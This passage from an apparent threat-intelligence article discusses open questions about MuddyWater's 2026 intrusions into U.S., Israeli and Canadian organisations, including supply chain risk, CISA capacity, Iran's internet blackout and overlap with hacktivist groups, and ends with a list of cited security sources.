What is the supply chain exposure from the compromised defense software company? A vendor that supplies technology to defense and aerospace clients, with operations in both the U.S. and Israel, represents a high-value pivot point. If MuddyWater has access to code repositories, build systems, or update mechanisms, the downstream exposure extends far beyond the vendor's own network. The public reporting has noted the supply chain risk in passing but has not addressed whether downstream clients have been notified, whether code integrity reviews are underway, or whether the vendor has engaged incident response capabilities commensurate with the risk.

Are U.S. defensive institutions resourced to respond at the scale required? CISA's reduced staffing is not just a Washington policy story. It has direct operational consequences for the organizations that depend on the agency's alerts, advisories, and coordination during periods of heightened threat activity. The Iranian cyber ecosystem has activated at a scale not seen before. Whether U.S. defensive capacity can match that scale is an open question that deserves honest discussion.

What role does Iran's internet blackout play in the timeline of cyber operations? Iran's internet connectivity dropped to between 1 and 4 percent beginning February 28, 2026, according to Palo Alto Networks' Unit 42 assessment. That connectivity loss likely hinders state-aligned operators based inside Iran from coordinating sophisticated attacks in the near term. But MuddyWater's pre-positioned accesses on U.S. and Israeli networks were established before the blackout. Backdoors that are already beaconing do not require the operator to be sitting in Tehran. And as Unit 42 noted, geographically dispersed operators and proxy groups may be operating independently under delegated authority.

Is there a coordination layer between MuddyWater and the hacktivist groups operating simultaneously? The public reporting treats MuddyWater's quiet persistent campaign and the loud hacktivist noise from groups like Handala Hack, NoName057(16), and the Fatemiyoun Electronic Team as parallel phenomena. But MOIS and IRGC-linked operations have historically used hacktivist-branded groups as operational fronts. The simultaneous activation of a sophisticated, persistent espionage campaign and a high-volume, noisy hacktivist campaign creates an almost ideal information environment for the quiet campaign: defenders overwhelmed with DDoS alerts and defacement claims are less likely to prioritize the slow, patient intrusion that has been running since February.


The disclosure of this campaign is significant, but it is not the end of the story. MuddyWater has continued operating through military escalations, diplomatic crises, and public attribution for nearly a decade. A public report naming its tools does not close an intrusion—it starts a new phase of the investigation. For organizations in sectors that overlap with this group's known targeting priorities, the time to be searching for these indicators is now, not after a disruptive event makes the question urgent.

The accesses established in early February 2026 represent the same optionality Iran has always pursued with its cyber operations—gather intelligence, build access, and decide later whether to use it for espionage or destruction—applied to a bank, an airport, a defense software supplier, and a Canadian nonprofit, in the middle of an active military conflict. The technical details matter for detection. But the strategic picture is what should be driving urgency.


Sources referenced in this article:
Symantec / Carbon Black Threat Hunter Team via Security.com
The Register
The Hacker News
Group-IB (Operation Olalampo)
Group-IB (Phoenix Backdoor)
Ctrl-Alt-Intel
Rescana (RustyWater)
Palo Alto Networks Unit 42
CloudSEK
UltraViolet Cyber
BeyondTrust
SentinelOne
Help Net Security
SC Media
Dark Reading
ESET (MuddyViper)
Infosecurity Magazine / Google GTIG
Nextgov/FCW
CSIS
Kaspersky (Tsundere Botnet)
Field Effect (IoT/Camera analysis)
MITRE ATT&CK (G0069)